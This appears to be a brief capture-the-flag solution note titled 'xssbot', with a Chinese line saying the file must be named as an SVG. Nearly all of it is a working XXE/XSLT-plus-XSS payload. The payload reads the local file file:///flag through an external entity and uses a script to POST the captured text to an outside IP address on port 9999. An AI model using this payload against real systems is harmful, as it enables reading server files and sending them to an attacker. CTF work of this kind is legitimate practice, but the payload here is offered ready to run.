xssbot

命名得是svg

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
  <!ENTITY flag_p        "file:///flag">
  <!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('')"/>
    <body xmlns="http://www.w3.org/1999/xhtml">
      <div style="display:none"><p class="&flag_p;">&flag_c;</p></div>
      <script>document.querySelectorAll('p').forEach(p => {fetch('http://165.154.5.221:9999',{body:p.innerHTML,method:"POST",headers:{'Content-Type':'application/x-www-form-urlencoded'}})});</script>
    </body>
  </xsl:template>
</xsl:stylesheet>
EOF